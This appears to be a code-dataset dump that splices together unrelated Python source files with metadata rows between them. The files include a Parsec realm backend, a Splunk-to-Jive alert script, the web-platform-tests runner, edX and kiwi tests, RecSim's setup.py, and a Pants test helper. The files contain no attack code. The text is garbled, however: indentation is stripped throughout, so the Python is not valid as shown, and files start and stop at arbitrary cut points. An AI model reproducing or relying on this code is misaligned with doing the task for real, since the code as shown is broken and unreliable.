from parsec.backend.user import BaseUserComponent, UserNotFoundError
from parsec.backend.message import BaseMessageComponent
from parsec.backend.memory.vlob import MemoryVlobComponent
from parsec.backend.memory.block import MemoryBlockComponent
@attr.s
class Realm:
status: RealmStatus = attr.ib(factory=lambda: RealmStatus(None, None, None, 1))
checkpoint: int = attr.ib(default=0)
granted_roles: List[RealmGrantedRole] = attr.ib(factory=list)
@property
def roles(self):
roles = {}
for x in sorted(self.granted_roles, key=lambda x: x.granted_on):
if x.role is None:
roles.pop(x.user_id, None)
else:
roles[x.user_id] = x.role
return roles
class MemoryRealmComponent(BaseRealmComponent):
def __init__(self, send_event):
self._send_event = send_event
self._user_component = None
self._message_component = None
self._vlob_component = None
self._block_component = None
self._realms = {}
self._maintenance_reencryption_is_finished_hook = None
def register_components(
self,
user: BaseUserComponent,
message: BaseMessageComponent,
vlob: MemoryVlobComponent,
block: MemoryBlockComponent,
**other_components,
):
self._user_component = user
self._message_component = message
self._vlob_component = vlob
self._block_component = block
def _get_realm(self, organization_id, realm_id):
try:
return self._realms[(organization_id, realm_id)]
except KeyError:
raise RealmNotFoundError(f"Realm `{realm_id}` doesn't exist")
async def create(
self, organization_id: OrganizationID, self_granted_role: RealmGrantedRole
) -> None:
assert self_granted_role.granted_by is not None
assert self_granted_role.granted_by.user_id == self_granted_role.user_id
assert self_granted_role.role == RealmRole.OWNER
key = (organization_id, self_granted_role.realm_id)
if key not in self._realms:
self._realms[key] = Realm(granted_roles=[self_granted_role])
await self._send_event(
BackendEvent.REALM_ROLES_UPDATED,
organization_id=organization_id,
author=self_granted_role.granted_by,
realm_id=self_granted_role.realm_id,
user=self_granted_role.user_id,
role=self_granted_role.role,
)
else:
raise RealmAlreadyExistsError()
async def get_status(
self, organization_id: OrganizationID, author: DeviceID, realm_id: UUID
) -> RealmStatus:
realm = self._get_realm(organization_id, realm_id)
if author.user_id not in realm.roles:
raise RealmAccessError()
return realm.status
async def get_stats(
self, organization_id: OrganizationID, author: DeviceID, realm_id: UUID
) -> RealmStats:
realm = self._get_realm(organization_id, realm_id)
if author.user_id not in realm.roles:
raise RealmAccessError()
blocks_size = 0
vlobs_size = 0
for value in self._block_component._blockmetas.values():
if value.realm_id == realm_id:
blocks_size += value.size
for value in self._vlob_component._vlobs.values():
if value.realm_id == realm_id:
vlobs_size += sum(len(blob) for (blob, _, _) in value.data)
return RealmStats(blocks_size=blocks_size, vlobs_size=vlobs_size)
async def get_current_roles(
self, organization_id: OrganizationID, realm_id: UUID
) -> Dict[UserID, RealmRole]:
realm = self._get_realm(organization_id, realm_id)
roles: Dict[UserID, RealmRole] = {}
for x in realm.granted_roles:
if x.role is None:
roles.pop(x.user_id, None)
else:
roles[x.user_id] = x.role
return roles
async def get_role_certificates(
self,
organization_id: OrganizationID,
author: DeviceID,
realm_id: UUID,
since: pendulum.DateTime,
) -> List[bytes]:
realm = self._get_realm(organization_id, realm_id)
if author.user_id not in realm.roles:
raise RealmAccessError()
if since:
return [x.certificate for x in realm.granted_roles if x.granted_on > since]
else:
return [x.certificate for x in realm.granted_roles]
async def update_roles(
self,
organization_id: OrganizationID,
new_role: RealmGrantedRole,
recipient_message: Optional[bytes] = None,
) -> None:
assert new_role.granted_by is not None
assert new_role.granted_by.user_id != new_role.user_id
# The only way for an OUTSIDER to be OWNER is to create his own realm
# (given he needs to have one to store it user manifest).
try:
user = self._user_component._get_user(organization_id, new_role.user_id)
except UserNotFoundError:
raise RealmNotFoundError(f"User `{new_role.user_id}` doesn't exist")
if user.profile == UserProfile.OUTSIDER and new_role.role in (
RealmRole.MANAGER,
RealmRole.OWNER,
):
raise RealmIncompatibleProfileError(
"User with OUTSIDER profile cannot be MANAGER or OWNER"
)
realm = self._get_realm(organization_id, new_role.realm_id)
if realm.status.in_maintenance:
raise RealmInMaintenanceError("Data realm is currently under maintenance")
owner_only = (RealmRole.OWNER,)
owner_or_manager = (RealmRole.OWNER, RealmRole.MANAGER)
existing_user_role = realm.roles.get(new_role.user_id)
needed_roles: Tuple[RealmRole, ...]
if existing_user_role in owner_or_manager or new_role.role in owner_or_manager:
needed_roles = owner_only
else:
needed_roles = owner_or_manager
author_role = realm.roles.get(new_role.granted_by.user_id)
if author_role not in needed_roles:
raise RealmAccessError()
if existing_user_role == new_role.role:
raise RealmRoleAlreadyGranted()
realm.granted_roles.append(new_role)
await self._send_event(
BackendEvent.REALM_ROLES_UPDATED,
organization_id=organization_id,
author=new_role.granted_by,
realm_id=new_role.realm_id,
user=new_role.user_id,
role=new_role.role,
)
if recipient_message is not None:
await self._message_component.send(
organization_id,
new_role.granted_by,
new_role.user_id,
new_role.granted_on,
recipient_message,
)
async def start_reencryption_maintenance(
self,
organization_id: OrganizationID,
author: DeviceID,
realm_id: UUID,
encryption_revision: int,
per_participant_message: Dict[UserID, bytes],
timestamp: pendulum.DateTime,
) -> None:
realm = self._get_realm(organization_id, realm_id)
if realm.roles.get(author.user_id) != RealmRole.OWNER:
raise RealmAccessError()
if realm.status.in_maintenance:
raise RealmInMaintenanceError(f"Realm `{realm_id}` alrealy in maintenance")
if encryption_revision != realm.status.encryption_revision + 1:
raise RealmEncryptionRevisionError("Invalid encryption revision")
now = pendulum.now()
not_revoked_roles = set()
for user_id in realm.roles.keys():
user = await self._user_component.get_user(organization_id, user_id)
if not user.revoked_on or user.revoked_on > now:
not_revoked_roles.add(user_id)
if per_participant_message.keys() ^ not_revoked_roles:
raise RealmParticipantsMismatchError(
"Realm participants and message recipients mismatch"
)
realm.status = RealmStatus(
maintenance_type=MaintenanceType.REENCRYPTION,
maintenance_started_on=timestamp,
maintenance_started_by=author,
encryption_revision=encryption_revision,
)
self._vlob_component._maintenance_reencryption_start_hook(
organization_id, realm_id, encryption_revision
)
# Should first send maintenance event, then message to each participant
await self._send_event(
BackendEvent.REALM_MAINTENANCE_STARTED,
organization_id=organization_id,
author=author,
realm_id=realm_id,
encryption_revision=encryption_revision,
)
for recipient, msg in per_participant_message.items():
await self._message_component.send(organization_id, author, recipient, timestamp, msg)
async def finish_reencryption_maintenance(
self,
organization_id: OrganizationID,
author: DeviceID,
realm_id: UUID,
encryption_revision: int,
) -> None:
realm = self._get_realm(organization_id, realm_id)
if realm.roles.get(author.user_id) != RealmRole.OWNER:
raise RealmAccessError()
if not realm.status.in_maintenance:
raise RealmNotInMaintenanceError(f"Realm `{realm_id}` not under maintenance")
if encryption_revision != realm.status.encryption_revision:
raise RealmEncryptionRevisionError("Invalid encryption revision")
if not self._vlob_component._maintenance_reencryption_is_finished_hook(
organization_id, realm_id, encryption_revision
):
raise RealmMaintenanceError("Reencryption operations are not over")
realm.status = RealmStatus(
maintenance_type=None,
maintenance_started_on=None,
maintenance_started_by=None,
encryption_revision=encryption_revision,
)
await self._send_event(
BackendEvent.REALM_MAINTENANCE_FINISHED,
organization_id=organization_id,
author=author,
realm_id=realm_id,
encryption_revision=encryption_revision,
)
async def get_realms_for_user(
self, organization_id: OrganizationID, user: UserID
) -> Dict[UUID, RealmRole]:
user_realms = {}
for (realm_org_id, realm_id), realm in self._realms.items():
if realm_org_id != organization_id:
continue
try:
user_realms[realm_id] = realm.roles[user]
except KeyError:
pass
return user_realms
| agpl-3.0 | -1,742,722,794,959,625,700 | 35.649842 | 98 | 0.622224 | false | 4.038234 | false | false | false |
jivesoftware/jive-splunk-ssi-alerts | splunk/bin/jive.py | 1 | 1818 | import sys
import json
import requests
# creates outbound message from alert payload contents
# and attempts to send to the specified endpoint
def send_message(payload):
config = payload.get('configuration')
# Get the Tile Endpoint URL
jive_url = config.get('jive_url')
# create outbound JSON message body
body = json.dumps({
"app" : payload.get("app"),
"owner" : payload.get("owner"),
"results_file" : payload.get("results_file"),
"results_link" : payload.get("results_link"),
"server_host" : payload.get("server_host"),
"server_uri" : payload.get("server_uri"),
"session_key" : payload.get("session_key"),
"sid" : payload.get("sid"),
"search_name" : payload.get("search_name"),
"result" : payload.get("result"),
})
# create outbound request object
try:
headers = {"Content-Type": "application/json"}
result = requests.post(url=jive_url, data=body, headers=headers)
#TODO: CHANGE THIS TO result.statuscode or result.code
print >>sys.stderr, "INFO Jive HTTP Response [%s] - [%s]" % (result.text, result.text)
except Exception, e:
print >> sys.stderr, "ERROR Error sending message: %s" % e
return False
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == "--execute":
try:
# retrieving message payload from splunk
raw_payload = sys.stdin.read()
payload = json.loads(raw_payload)
send_message(payload)
except Exception, e:
print >> sys.stderr, "ERROR Unexpected error: %s" % e
sys.exit(3)
else:
print >> sys.stderr, "FATAL Unsupported execution mode (expected --execute flag)"
sys.exit(1)
| apache-2.0 | 1,257,286,227,576,477,000 | 36.102041 | 94 | 0.587459 | false | 3.717791 | false | false | false |
mhaessig/servo | tests/wpt/web-platform-tests/tools/wpt/run.py | 2 | 13550 | import argparse
import os
import platform
import shutil
import subprocess
import sys
import tarfile
from distutils.spawn import find_executable
wpt_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
sys.path.insert(0, os.path.abspath(os.path.join(wpt_root, "tools")))
from . import browser, utils, virtualenv
logger = None
class WptrunError(Exception):
pass
class WptrunnerHelpAction(argparse.Action):
def __init__(self,
option_strings,
dest=argparse.SUPPRESS,
default=argparse.SUPPRESS,
help=None):
super(WptrunnerHelpAction, self).__init__(
option_strings=option_strings,
dest=dest,
default=default,
nargs=0,
help=help)
def __call__(self, parser, namespace, values, option_string=None):
from wptrunner import wptcommandline
wptparser = wptcommandline.create_parser()
wptparser.usage = parser.usage
wptparser.print_help()
parser.exit()
def create_parser():
from wptrunner import wptcommandline
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("product", action="store",
help="Browser to run tests in")
parser.add_argument("--yes", "-y", dest="prompt", action="store_false", default=True,
help="Don't prompt before installing components")
parser.add_argument("--stability", action="store_true",
help="Stability check tests")
parser.add_argument("--install-browser", action="store_true",
help="Install the latest development version of the browser")
parser._add_container_actions(wptcommandline.create_parser())
return parser
def exit(msg):
logger.error(msg)
sys.exit(1)
def args_general(kwargs):
kwargs.set_if_none("tests_root", wpt_root)
kwargs.set_if_none("metadata_root", wpt_root)
kwargs.set_if_none("manifest_update", True)
if kwargs["ssl_type"] in (None, "pregenerated"):
cert_root = os.path.join(wpt_root, "tools", "certs")
if kwargs["ca_cert_path"] is None:
kwargs["ca_cert_path"] = os.path.join(cert_root, "cacert.pem")
if kwargs["host_key_path"] is None:
kwargs["host_key_path"] = os.path.join(cert_root, "web-platform.test.key")
if kwargs["host_cert_path"] is None:
kwargs["host_cert_path"] = os.path.join(cert_root, "web-platform.test.pem")
elif kwargs["ssl_type"] == "openssl":
if not find_executable(kwargs["openssl_binary"]):
if os.uname()[0] == "Windows":
raise WptrunError("""OpenSSL binary not found. If you need HTTPS tests, install OpenSSL from
https://slproweb.com/products/Win32OpenSSL.html
Ensuring that libraries are added to /bin and add the resulting bin directory to
your PATH.
Otherwise run with --ssl-type=none""")
else:
raise WptrunError("""OpenSSL not found. If you don't need HTTPS support run with --ssl-type=none,
otherwise install OpenSSL and ensure that it's on your $PATH.""")
def check_environ(product):
if product not in ("firefox", "servo"):
expected_hosts = ["web-platform.test",
"www.web-platform.test",
"www1.web-platform.test",
"www2.web-platform.test",
"xn--n8j6ds53lwwkrqhv28a.web-platform.test",
"xn--lve-6lad.web-platform.test",
"nonexistent-origin.web-platform.test"]
missing_hosts = set(expected_hosts)
if platform.uname()[0] != "Windows":
hosts_path = "/etc/hosts"
else:
hosts_path = "C:\Windows\System32\drivers\etc\hosts"
with open(hosts_path, "r") as f:
for line in f:
line = line.split("#", 1)[0].strip()
parts = line.split()
if len(parts) == 2:
host = parts[1]
missing_hosts.discard(host)
if missing_hosts:
raise WptrunError("""Missing hosts file configuration. Expected entries like:
%s
See README.md for more details.""" % "\n".join("%s\t%s" %
("127.0.0.1" if "nonexistent" not in host else "0.0.0.0", host)
for host in expected_hosts))
class BrowserSetup(object):
name = None
browser_cls = None
def __init__(self, venv, prompt=True, sub_product=None):
self.browser = self.browser_cls()
self.venv = venv
self.prompt = prompt
self.sub_product = sub_product
def prompt_install(self, component):
if not self.prompt:
return True
while True:
resp = raw_input("Download and install %s [Y/n]? " % component).strip().lower()
if not resp or resp == "y":
return True
elif resp == "n":
return False
def install(self, venv):
if self.prompt_install(self.name):
return self.browser.install(venv.path)
def setup(self, kwargs):
self.venv.install_requirements(os.path.join(wpt_root, "tools", "wptrunner", self.browser.requirements))
self.setup_kwargs(kwargs)
class Firefox(BrowserSetup):
name = "firefox"
browser_cls = browser.Firefox
def setup_kwargs(self, kwargs):
if kwargs["binary"] is None:
binary = self.browser.find_binary()
if binary is None:
raise WptrunError("""Firefox binary not found on $PATH.
Install Firefox or use --binary to set the binary path""")
kwargs["binary"] = binary
if kwargs["certutil_binary"] is None and kwargs["ssl_type"] != "none":
certutil = self.browser.find_certutil()
if certutil is None:
# Can't download this for now because it's missing the libnss3 library
raise WptrunError("""Can't find certutil.
This must be installed using your OS package manager or directly e.g.
Debian/Ubuntu:
sudo apt install libnss3-tools
macOS/Homebrew:
brew install nss
Others:
Download the firefox archive and common.tests.zip archive for your platform
from https://archive.mozilla.org/pub/firefox/nightly/latest-mozilla-central/
Then extract certutil[.exe] from the tests.zip package and
libnss3[.so|.dll|.dynlib] and but the former on your path and the latter on
your library path.
""")
else:
print("Using certutil %s" % certutil)
if certutil is not None:
kwargs["certutil_binary"] = certutil
else:
print("Unable to find or install certutil, setting ssl-type to none")
kwargs["ssl_type"] = "none"
if kwargs["webdriver_binary"] is None and "wdspec" in kwargs["test_types"]:
webdriver_binary = self.browser.find_webdriver()
if webdriver_binary is None:
install = self.prompt_install("geckodriver")
if install:
print("Downloading geckodriver")
webdriver_binary = self.browser.install_webdriver(dest=self.venv.bin_path)
else:
print("Using webdriver binary %s" % webdriver_binary)
if webdriver_binary:
kwargs["webdriver_binary"] = webdriver_binary
else:
print("Unable to find or install geckodriver, skipping wdspec tests")
kwargs["test_types"].remove("wdspec")
if kwargs["prefs_root"] is None:
print("Downloading gecko prefs")
prefs_root = self.browser.install_prefs(self.venv.path)
kwargs["prefs_root"] = prefs_root
class Chrome(BrowserSetup):
name = "chrome"
browser_cls = browser.Chrome
def setup_kwargs(self, kwargs):
if kwargs["webdriver_binary"] is None:
webdriver_binary = self.browser.find_webdriver()
if webdriver_binary is None:
install = self.prompt_install("chromedriver")
if install:
print("Downloading chromedriver")
webdriver_binary = self.browser.install_webdriver(dest=self.venv.bin_path)
else:
print("Using webdriver binary %s" % webdriver_binary)
if webdriver_binary:
kwargs["webdriver_binary"] = webdriver_binary
else:
raise WptrunError("Unable to locate or install chromedriver binary")
class Edge(BrowserSetup):
name = "edge"
browser_cls = browser.Edge
def install(self, venv):
raise NotImplementedError
def setup_kwargs(self, kwargs):
if kwargs["webdriver_binary"] is None:
webdriver_binary = self.browser.find_webdriver()
if webdriver_binary is None:
raise WptrunError("""Unable to find WebDriver and we aren't yet clever enough to work out which
version to download. Please go to the following URL and install the correct
version for your Edge/Windows release somewhere on the %PATH%:
https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/
""")
kwargs["webdriver_binary"] = webdriver_binary
class InternetExplorer(BrowserSetup):
name = "ie"
browser_cls = browser.InternetExplorer
def install(self, venv):
raise NotImplementedError
def setup_kwargs(self, kwargs):
if kwargs["webdriver_binary"] is None:
webdriver_binary = self.browser.find_webdriver()
if webdriver_binary is None:
raise WptrunError("""Unable to find WebDriver and we aren't yet clever enough to work out which
version to download. Please go to the following URL and install the driver for Internet Explorer
somewhere on the %PATH%:
https://selenium-release.storage.googleapis.com/index.html
""")
kwargs["webdriver_binary"] = webdriver_binary
class Sauce(BrowserSetup):
name = "sauce"
browser_cls = browser.Sauce
def install(self, venv):
raise NotImplementedError
def setup_kwargs(self, kwargs):
kwargs.set_if_none("sauce_browser", self.sub_product[0])
kwargs.set_if_none("sauce_version", self.sub_product[1])
kwargs["test_types"] = ["testharness", "reftest"]
class Servo(BrowserSetup):
name = "servo"
browser_cls = browser.Servo
def install(self, venv):
raise NotImplementedError
def setup_kwargs(self, kwargs):
if kwargs["binary"] is None:
binary = self.browser.find_binary()
if binary is None:
raise WptrunError("Unable to find servo binary on the PATH")
kwargs["binary"] = binary
product_setup = {
"firefox": Firefox,
"chrome": Chrome,
"edge": Edge,
"ie": InternetExplorer,
"servo": Servo,
"sauce": Sauce,
}
def setup_wptrunner(venv, prompt=True, install=False, **kwargs):
from wptrunner import wptrunner, wptcommandline
global logger
kwargs = utils.Kwargs(kwargs.iteritems())
product_parts = kwargs["product"].split(":")
kwargs["product"] = product_parts[0]
sub_product = product_parts[1:]
wptrunner.setup_logging(kwargs, {"mach": sys.stdout})
logger = wptrunner.logger
check_environ(kwargs["product"])
args_general(kwargs)
if kwargs["product"] not in product_setup:
raise WptrunError("Unsupported product %s" % kwargs["product"])
setup_cls = product_setup[kwargs["product"]](venv, prompt, sub_product)
if install:
logger.info("Installing browser")
kwargs["binary"] = setup_cls.install(venv)
setup_cls.setup(kwargs)
wptcommandline.check_args(kwargs)
wptrunner_path = os.path.join(wpt_root, "tools", "wptrunner")
venv.install_requirements(os.path.join(wptrunner_path, "requirements.txt"))
return kwargs
def run(venv, **kwargs):
#Remove arguments that aren't passed to wptrunner
prompt = kwargs.pop("prompt", True)
stability = kwargs.pop("stability", True)
install_browser = kwargs.pop("install_browser", False)
kwargs = setup_wptrunner(venv,
prompt=prompt,
install=install_browser,
**kwargs)
if stability:
import stability
iterations, results, inconsistent = stability.run(venv, logger, **kwargs)
def log(x):
print(x)
if inconsistent:
stability.write_inconsistent(log, inconsistent, iterations)
else:
log("All tests stable")
rv = len(inconsistent) > 0
else:
rv = run_single(venv, **kwargs) > 0
return rv
def run_single(venv, **kwargs):
from wptrunner import wptrunner
return wptrunner.start(**kwargs)
def main():
try:
parser = create_parser()
args = parser.parse_args()
venv = virtualenv.Virtualenv(os.path.join(wpt_root, "_venv_%s") % platform.uname()[0])
venv.start()
venv.install_requirements(os.path.join(wpt_root, "tools", "wptrunner", "requirements.txt"))
venv.install("requests")
return run(venv, vars(args))
except WptrunError as e:
exit(e.message)
if __name__ == "__main__":
import pdb
from tools import localpaths
try:
main()
except:
pdb.post_mortem()
| mpl-2.0 | -1,231,535,169,148,979,200 | 31.338902 | 113 | 0.605387 | false | 4.006505 | true | false | false |
b1-systems/kiwi | test/unit/container_image_docker_test.py | 1 | 1827 | from mock import (
call, patch, Mock
)
from kiwi.container.docker import ContainerImageDocker
class TestContainerImageDocker(object):
@patch('kiwi.container.docker.Compress')
@patch('kiwi.container.docker.Command.run')
@patch('kiwi.container.oci.RuntimeConfig')
@patch('kiwi.container.oci.OCI')
def test_pack_image_to_file(
self, mock_OCI, mock_RuntimeConfig, mock_command, mock_compress
):
oci = Mock()
oci.container_name = 'kiwi_oci_dir.XXXX/oci_layout:latest'
mock_OCI.return_value = oci
compressor = Mock()
compressor.xz = Mock(
return_value='result.tar.xz'
)
mock_compress.return_value = compressor
docker = ContainerImageDocker(
'root_dir', {
'container_name': 'foo/bar',
'additional_tags': ['current', 'foobar']
}
)
docker.runtime_config.get_container_compression = Mock(
return_value='xz'
)
assert docker.pack_image_to_file('result.tar') == 'result.tar.xz'
assert mock_command.call_args_list == [
call(['rm', '-r', '-f', 'result.tar']),
call([
'skopeo', 'copy', 'oci:kiwi_oci_dir.XXXX/oci_layout:latest',
'docker-archive:result.tar:foo/bar:latest',
'--additional-tag', 'foo/bar:current',
'--additional-tag', 'foo/bar:foobar'
])
]
mock_compress.assert_called_once_with('result.tar')
compressor.xz.assert_called_once_with(
docker.runtime_config.get_xz_options.return_value
)
docker.runtime_config.get_container_compression = Mock(
return_value=None
)
assert docker.pack_image_to_file('result.tar') == 'result.tar'
| gpl-3.0 | -8,185,668,525,592,596,000 | 32.833333 | 76 | 0.574165 | false | 3.683468 | false | false | false |
UQ-UQx/edx-platform_lti | lms/djangoapps/courseware/tests/test_masquerade.py | 1 | 4291 | """
Unit tests for masquerade
Based on (and depends on) unit tests for courseware.
Notes for running by hand:
./manage.py lms --settings test test lms/djangoapps/courseware
"""
import json
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from courseware.tests.factories import StaffFactory
from courseware.tests.helpers import LoginEnrollmentTestCase
from lms.djangoapps.lms_xblock.runtime import quote_slashes
from xmodule.modulestore.django import modulestore, clear_existing_modulestores
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.django_utils import TEST_DATA_MIXED_GRADED_MODULESTORE
# TODO: the "abtest" node in the sample course "graded" is currently preventing
# it from being successfully loaded in the mongo modulestore.
# Fix this testcase class to not depend on that course, and let it use
# the mocked modulestore instead of the XML.
@override_settings(MODULESTORE=TEST_DATA_MIXED_GRADED_MODULESTORE)
class TestStaffMasqueradeAsStudent(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Check for staff being able to masquerade as student.
"""
def setUp(self):
# Clear out the modulestores, causing them to reload
clear_existing_modulestores()
self.graded_course = modulestore().get_course(SlashSeparatedCourseKey("edX", "graded", "2012_Fall"))
# Create staff account
self.staff = StaffFactory(course_key=self.graded_course.id)
self.logout()
# self.staff.password is the sha hash but login takes the plain text
self.login(self.staff.email, 'test')
self.enroll(self.graded_course)
def get_cw_section(self):
url = reverse('courseware_section',
kwargs={'course_id': self.graded_course.id.to_deprecated_string(),
'chapter': 'GradedChapter',
'section': 'Homework1'})
resp = self.client.get(url)
print "url ", url
return resp
def test_staff_debug_for_staff(self):
resp = self.get_cw_section()
sdebug = 'Staff Debug Info'
print resp.content
self.assertTrue(sdebug in resp.content)
def toggle_masquerade(self):
"""
Toggle masquerade state.
"""
masq_url = reverse('masquerade-switch', kwargs={'marg': 'toggle'})
print "masq_url ", masq_url
resp = self.client.get(masq_url)
return resp
def test_no_staff_debug_for_student(self):
togresp = self.toggle_masquerade()
print "masq now ", togresp.content
self.assertEqual(togresp.content, '{"status": "student"}', '')
resp = self.get_cw_section()
sdebug = 'Staff Debug Info'
self.assertFalse(sdebug in resp.content)
def get_problem(self):
pun = 'H1P1'
problem_location = self.graded_course.id.make_usage_key("problem", pun)
modx_url = reverse('xblock_handler',
kwargs={'course_id': self.graded_course.id.to_deprecated_string(),
'usage_id': quote_slashes(problem_location.to_deprecated_string()),
'handler': 'xmodule_handler',
'suffix': 'problem_get'})
resp = self.client.get(modx_url)
print "modx_url ", modx_url
return resp
def test_showanswer_for_staff(self):
resp = self.get_problem()
html = json.loads(resp.content)['html']
print html
sabut = '<button class="show"><span class="show-label">Show Answer</span> <span class="sr">Reveal Answer</span></button>'
self.assertTrue(sabut in html)
def test_no_showanswer_for_student(self):
togresp = self.toggle_masquerade()
print "masq now ", togresp.content
self.assertEqual(togresp.content, '{"status": "student"}', '')
resp = self.get_problem()
html = json.loads(resp.content)['html']
sabut = '<button class="show"><span class="show-label" aria-hidden="true">Show Answer</span> <span class="sr">Reveal answer above</span></button>'
self.assertFalse(sabut in html)
| agpl-3.0 | -9,220,477,234,079,998,000 | 36.973451 | 154 | 0.648567 | false | 4.021556 | true | false | false |
google-research/recsim | setup.py | 1 | 2855 | # coding=utf-8
# Copyright 2019 The RecSim Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup script for RecSim.
This script will install RecSim as a Python module.
See: https://github.com/google-research/recsim
"""
from os import path
from setuptools import find_packages
from setuptools import setup
here = path.abspath(path.dirname(__file__))
install_requires = [
'absl-py',
'dopamine-rl >= 2.0.5',
'gin-config',
'gym',
'numpy',
'scipy',
'tensorflow',
]
recsim_description = (
'RecSim: A Configurable Recommender Systems Simulation Platform')
with open('README.md', 'r') as fh:
long_description = fh.read()
setup(
name='recsim',
version='0.2.4',
author='The RecSim Team',
author_email='[email protected]',
description=recsim_description,
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/google-research/recsim',
packages=find_packages(exclude=['docs']),
classifiers=[ # Optional
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
# Pick your license as you wish
'License :: OSI Approved :: Apache Software License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
],
install_requires=install_requires,
project_urls={ # Optional
'Documentation': 'https://github.com/google-research/recsim',
'Bug Reports': 'https://github.com/google-research/recsim/issues',
'Source': 'https://github.com/google-research/recsim',
},
license='Apache 2.0',
keywords='recsim reinforcement-learning recommender-system simulation'
)
| apache-2.0 | 9,064,123,179,898,431,000 | 31.816092 | 77 | 0.676357 | false | 3.998599 | false | false | false |
ericzundel/pants | tests/python/pants_test/engine/legacy/test_changed_integration.py | 1 | 15510 | # coding=utf-8
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
import shutil
import subprocess
from contextlib import contextmanager
from textwrap import dedent
from pants.base.build_environment import get_buildroot
from pants.util.contextutil import environment_as, temporary_dir
from pants.util.dirutil import safe_mkdir, safe_open, touch
from pants_test.base_test import TestGenerator
from pants_test.pants_run_integration_test import PantsRunIntegrationTest, ensure_engine
from pants_test.testutils.git_util import initialize_repo
def lines_to_set(str_or_list):
if isinstance(str_or_list, list):
return set(str_or_list)
else:
return set(x for x in str(str_or_list).split('\n') if x)
@contextmanager
def mutated_working_copy(files_to_mutate, to_append='\n '):
"""Given a list of files, append whitespace to each of them to trigger a git diff - then reset."""
assert to_append, 'to_append may not be empty'
for f in files_to_mutate:
with open(f, 'ab') as fh:
fh.write(to_append)
try:
yield
finally:
seek_point = len(to_append) * -1
for f in files_to_mutate:
with open(f, 'ab') as fh:
fh.seek(seek_point, os.SEEK_END)
fh.truncate()
@contextmanager
def create_isolated_git_repo():
# Isolated Git Repo Structure:
# worktree
# |--README
# |--pants.ini
# |--3rdparty
# |--BUILD
# |--src
# |--resources
# |--org/pantsbuild/resourceonly
# |--BUILD
# |--README.md
# |--java
# |--org/pantsbuild/helloworld
# |--BUILD
# |--helloworld.java
# |--python
# |--python_targets
# |--BUILD
# |--test_binary.py
# |--test_library.py
# |--test_unclaimed_src.py
# |--sources
# |--BUILD
# |--sources.py
# |--sources.txt
# |--tests
# |--scala
# |--org/pantsbuild/cp-directories
# |--BUILD
# |--ClasspathDirectoriesSpec.scala
with temporary_dir(root_dir=get_buildroot()) as worktree:
with safe_open(os.path.join(worktree, 'README'), 'w') as fp:
fp.write('Just a test tree.')
# Create an empty pants config file.
touch(os.path.join(worktree, 'pants.ini'))
# Copy .gitignore to new repo.
shutil.copyfile('.gitignore', os.path.join(worktree, '.gitignore'))
with initialize_repo(worktree=worktree, gitdir=os.path.join(worktree, '.git')) as git:
# Resource File
resource_file = os.path.join(worktree, 'src/resources/org/pantsbuild/resourceonly/README.md')
with safe_open(resource_file, 'w') as fp:
fp.write('Just resource.')
resource_build_file = os.path.join(worktree, 'src/resources/org/pantsbuild/resourceonly/BUILD')
with safe_open(resource_build_file, 'w') as fp:
fp.write(dedent("""
resources(
name='resource',
sources=['README.md'],
)
"""))
git.add(resource_file, resource_build_file)
git.commit('Check in a resource target.')
# Java Program
src_file = os.path.join(worktree, 'src/java/org/pantsbuild/helloworld/helloworld.java')
with safe_open(src_file, 'w') as fp:
fp.write(dedent("""
package org.pantsbuild.helloworld;
class HelloWorld {
public static void main(String[] args) {
System.out.println("Hello, World!\n");
}
}
"""))
src_build_file = os.path.join(worktree, 'src/java/org/pantsbuild/helloworld/BUILD')
with safe_open(src_build_file, 'w') as fp:
fp.write(dedent("""
jvm_binary(
dependencies=[
'{}',
],
source='helloworld.java',
main='org.pantsbuild.helloworld.HelloWorld',
)
""".format('src/resources/org/pantsbuild/resourceonly:resource')))
git.add(src_file, src_build_file)
git.commit('hello world java program with a dependency on a resource file.')
# Scala Program
scala_src_dir = os.path.join(worktree, 'tests/scala/org/pantsbuild/cp-directories')
safe_mkdir(os.path.dirname(scala_src_dir))
shutil.copytree('testprojects/tests/scala/org/pantsbuild/testproject/cp-directories', scala_src_dir)
git.add(scala_src_dir)
git.commit('Check in a scala test target.')
# Python library and binary
python_src_dir = os.path.join(worktree, 'src/python/python_targets')
safe_mkdir(os.path.dirname(python_src_dir))
shutil.copytree('testprojects/src/python/python_targets', python_src_dir)
git.add(python_src_dir)
git.commit('Check in python targets.')
# A `python_library` with `resources=['file.name']`.
python_src_dir = os.path.join(worktree, 'src/python/sources')
safe_mkdir(os.path.dirname(python_src_dir))
shutil.copytree('testprojects/src/python/sources', python_src_dir)
git.add(python_src_dir)
git.commit('Check in a python library with resource dependency.')
# Copy 3rdparty/BUILD.
_3rdparty_build = os.path.join(worktree, '3rdparty/BUILD')
safe_mkdir(os.path.dirname(_3rdparty_build))
shutil.copyfile('3rdparty/BUILD', _3rdparty_build)
git.add(_3rdparty_build)
git.commit('Check in 3rdparty/BUILD.')
